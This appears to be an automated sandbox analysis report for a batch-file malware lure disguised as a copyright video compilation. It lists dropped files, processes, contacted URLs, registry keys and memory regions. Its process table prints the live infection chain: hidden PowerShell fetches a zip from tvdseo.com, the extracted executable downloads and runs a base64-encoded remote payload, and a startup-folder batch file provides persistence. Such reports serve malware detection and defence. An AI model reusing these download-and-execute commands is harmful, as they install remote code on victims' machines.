Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Compilation of videos and images protected by copyright.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat
|
ASCII text, with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3odcfkwy.dfe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enmtd0fl.ei4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmfcf05r.dgl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phftuy4f.ewp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Compilation of videos and images protected by copyright.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName
System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', 'C:\Users\Public\UI4yoSvOgB.zip')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -c Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/UI4yoSvOgB.zip',
'C:/Users/Public/UI4yoSvOgB')
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c start "" /min C:\Users\Public\UI4yoSvOgB\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://tvdseo.com/file/STC/STC_BOT').read().decode('utf-8')))"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat"
"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://tvdseo.com
|
unknown
|
|
|
|
https://tvdseo.com/file/synaptics.zip
|
104.21.81.137
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://tvdseo.com
|
unknown
|
||
|
https://tvdseo.com/file/STC/STC_BOT
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
tvdseo.com
|
104.21.81.137
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.81.137
|
tvdseo.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\ndfapi.dll,-40001
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6F80000
|
heap
|
page execute and read and write
|
||
|
1C9C8747000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
1C9C6A86000
|
heap
|
page read and write
|
||
|
1C9DF050000
|
heap
|
page read and write
|
||
|
1FFC7107000
|
heap
|
page read and write
|
||
|
1C9DEFF0000
|
heap
|
page read and write
|
||
|
1C9C53F4000
|
heap
|
page read and write
|
||
|
1C9D7157000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6FA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
A044C7E000
|
stack
|
page read and write
|
||
|
1FFC710A000
|
heap
|
page read and write
|
||
|
A04497E000
|
stack
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC404000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF540000
|
heap
|
page read and write
|
||
|
1C9C51E0000
|
heap
|
page read and write
|
||
|
1C9C6A60000
|
heap
|
page readonly
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
1C9C53D0000
|
heap
|
page read and write
|
||
|
A044DB7000
|
stack
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A044873000
|
stack
|
page read and write
|
||
|
1C9C5000000
|
heap
|
page read and write
|
||
|
7FFAAC41B000
|
trusted library allocation
|
page read and write
|
||
|
A044B7E000
|
stack
|
page read and write
|
||
|
1C9C85C4000
|
trusted library allocation
|
page read and write
|
||
|
A044F3E000
|
stack
|
page read and write
|
||
|
1C9C508D000
|
heap
|
page read and write
|
||
|
1C9C5044000
|
heap
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A044E39000
|
stack
|
page read and write
|
||
|
1C9C6A30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
1FFC7030000
|
heap
|
page read and write
|
||
|
1C9C5013000
|
heap
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6A83000
|
heap
|
page read and write
|
||
|
7FFAAC5E2000
|
trusted library allocation
|
page read and write
|
||
|
1C9C702A000
|
trusted library allocation
|
page read and write
|
||
|
1C9C505E000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
1C9DF0BD000
|
heap
|
page read and write
|
||
|
7FFAAC402000
|
trusted library allocation
|
page read and write
|
||
|
1C9C53F0000
|
heap
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC45C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C9DF200000
|
heap
|
page read and write
|
||
|
A0449FE000
|
stack
|
page read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
A044BFE000
|
stack
|
page read and write
|
||
|
1C9DF033000
|
heap
|
page read and write
|
||
|
1C9C8B19000
|
trusted library allocation
|
page read and write
|
||
|
A045B0E000
|
stack
|
page read and write
|
||
|
7FFAAC4B6000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF05A000
|
heap
|
page read and write
|
||
|
1C9DF029000
|
heap
|
page read and write
|
||
|
1C9C6E40000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC4BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4A0DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C9C5200000
|
heap
|
page read and write
|
||
|
1FFC7060000
|
heap
|
page read and write
|
||
|
1C9C5040000
|
heap
|
page read and write
|
||
|
1C9C7BD2000
|
trusted library allocation
|
page read and write
|
||
|
1C9C8750000
|
trusted library allocation
|
page read and write
|
||
|
3F948FF000
|
stack
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF027000
|
heap
|
page read and write
|
||
|
1FFC7040000
|
heap
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
1C9C85E8000
|
trusted library allocation
|
page read and write
|
||
|
1C9C8BE3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5BA000
|
trusted library allocation
|
page read and write
|
||
|
1C9C8BDF000
|
trusted library allocation
|
page read and write
|
||
|
A044FBE000
|
stack
|
page read and write
|
||
|
1C9C503E000
|
heap
|
page read and write
|
||
|
1C9C6F90000
|
heap
|
page execute and read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF05D000
|
heap
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
A04503C000
|
stack
|
page read and write
|
||
|
1C9C71D2000
|
trusted library allocation
|
page read and write
|
||
|
1C9C5086000
|
heap
|
page read and write
|
||
|
1C9DF2E0000
|
heap
|
page read and write
|
||
|
A044D3F000
|
stack
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
1C9C894F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
A044A7E000
|
stack
|
page read and write
|
||
|
1C9DF04E000
|
heap
|
page read and write
|
||
|
1FFC73B0000
|
heap
|
page read and write
|
||
|
3F9458C000
|
stack
|
page read and write
|
||
|
A044AFD000
|
stack
|
page read and write
|
||
|
7FFAAC403000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6A80000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC40D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
1C9C85DA000
|
trusted library allocation
|
page read and write
|
||
|
1C9DEFF2000
|
heap
|
page read and write
|
||
|
A045B8E000
|
stack
|
page read and write
|
||
|
1C9D728F000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF0C4000
|
heap
|
page read and write
|
||
|
A045C0D000
|
stack
|
page read and write
|
||
|
A0450BE000
|
stack
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
A04513B000
|
stack
|
page read and write
|
||
|
1C9C6F87000
|
heap
|
page execute and read and write
|
||
|
1C9C85C9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
1C9C5100000
|
heap
|
page read and write
|
||
|
1C9DF32A000
|
heap
|
page read and write
|
||
|
1C9C50E7000
|
heap
|
page read and write
|
||
|
1C9C5009000
|
heap
|
page read and write
|
||
|
A044EB8000
|
stack
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF325000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5B1000
|
trusted library allocation
|
page read and write
|
||
|
1FFC7100000
|
heap
|
page read and write
|
||
|
1C9C6A50000
|
trusted library allocation
|
page read and write
|
||
|
1C9D6FA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
A0448FE000
|
stack
|
page read and write
|
||
|
1C9D7015000
|
trusted library allocation
|
page read and write
|
||
|
1C9D6FB0000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6E5B000
|
heap
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F9487F000
|
stack
|
page read and write
|
||
|
1C9C6E03000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6E00000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
1C9C85EC000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
1C9DF1A0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
1C9C6A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
1C9C8951000
|
trusted library allocation
|
page read and write
|
||
|
A044CF9000
|
stack
|
page read and write
|
||
|
1FFC73B4000
|
heap
|
page read and write
|
There are 143 hidden memdumps, click here to show them.